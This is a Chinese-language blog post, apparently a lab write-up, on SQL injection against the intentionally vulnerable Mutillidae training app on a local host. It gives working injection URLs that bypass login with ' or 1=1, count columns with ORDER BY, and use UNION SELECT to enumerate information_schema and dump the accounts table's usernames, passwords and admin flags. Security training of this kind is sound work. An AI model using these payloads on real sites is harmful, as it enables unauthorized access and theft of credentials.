Chinaunix首页 | 论坛 | 博客
  • 博客访问: 1790141
  • 博文数量: 297
  • 博客积分: 285
  • 博客等级: 二等列兵
  • 技术积分: 3006
  • 用 户 组: 普通用户
  • 注册时间: 2010-03-06 22:04
个人简介

Linuxer, ex IBMer. GNU https://hmchzb19.github.io/

文章分类

全部博文(297)

文章存档

2020年(11)

2019年(15)

2018年(43)

2017年(79)

2016年(79)

2015年(58)

2014年(1)

2013年(8)

2012年(3)

分类: 网络与安全

2017-10-29 16:20:19

继续 SQL Injection 之旅,Mutillidae 的security level 共分为0,1,5.
0,1 都可以SQL injection, level 5则无法SQL injection.

1. 首先尝试security level 0下的注入, security level 1 会有少许不同.
选择SQLi Extract Data -> User Info.
在弹出的页面中随意输入用户名为kobe, password 是user.然后查看结构发现是GET方式输入, (kobe是我以前注册的帐号)
URL 为.


这就是我们要操作的地方了,首先尝试在username这里注入:
username=kobe' or 1=1%23
' or 1=1%23&password=aaa&user-info-php-submit-button=View+Account+Details
就列出了所有的用户名, 密码, signature.

同样的尝试注入password.
&password=aaa' or 1=1%23&user-info-php-submit-button=View+Account+Details
得到的结果一样.

那么这个页面能列出多少列呢?
使用order by 字句.
从order by 1开始,结束于order by 100.然后可以用二分查找order by n 不报错,这个n就是这个页面能列出的列数. 经过尝试,这个页面能列出5个column.

' order by 1%23&password=aaa&user-info-php-submit-button=View+Account+Details
' order by 10%23&password=aaa&user-info-php-submit-button=View+Account+Details
' order by 5%23&password=aaa&user-info-php-submit-button=View+Account+Details

下面使用Union子句查看页面显示的是哪些, 知道我们可以把column 2,3,4修改掉.

点击(此处)折叠或打开

  1. %27 union select 1,2,3,4,5%23&password=aaa&user-info-php-submit-button=View+Account+Details
  2. Username=kobe
    Password=abc-123
    Signature=test kobe

    Username=2
    Password=3
    Signature=4

下面查询出数据库的database, user, version.

点击(此处)折叠或打开

  1. http://192.168.0.105/mutillidae/index.php?page=user-info.php&username=kobe%27 union select 1,database(),user(),version(),5%23&password=aaa&user-info-php-submit-button=View+Account+Details
  2. #得到下面的信息
  3. Username=owasp10
  4. Password=root@localhost
  5. Signature=5.0.51a-3ubuntu5
查出数据owasp10有多少表

点击(此处)折叠或打开

  1. http://192.168.0.105/mutillidae/index.php?page=user-info.php&username=kobe%27 union select 1,table_name,null,null,5 from information_schema.tables where table_schema='owasp10'%23&password=abc-123&user-info-php-submit-button=View+Account+Details
  2. #得到下面的表
  3. Username=accounts
    Password=
    Signature=

    Username=blogs_table
    Password=
    Signature=

    Username=captured_data
    Password=
    Signature=

    Username=credit_cards
    Password=
    Signature=

    Username=hitlog
    Password=
    Signature=

    Username=pen_test_tools
    Password=
    Signature=

查accounts 所有的column.

点击(此处)折叠或打开

  1. http://192.168.0.105/mutillidae/index.php?page=user-info.php&username=kobe%27 union select 1,column_name,null,null,5 from information_schema.columns where table_name='accounts'%23&password=aaa&user-info-php-submit-button=View+Account+Details
  2. #得到所有的列
  3. Username=cid
    Password=
    Signature=

    Username=username
    Password=
    Signature=

    Username=password
    Password=
    Signature=

    Username=mysignature
    Password=
    Signature=

    Username=is_admin
    Password=
    Signature=
查accounts表所有的row.

点击(此处)折叠或打开

  1. http://192.168.0.105/mutillidae/index.php?page=user-info.php&username=kobe%27 union select 1,username,password,is_admin,5 from accounts%23&password=aaa&user-info-php-submit-button=View+Account+Details





阅读(1847) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~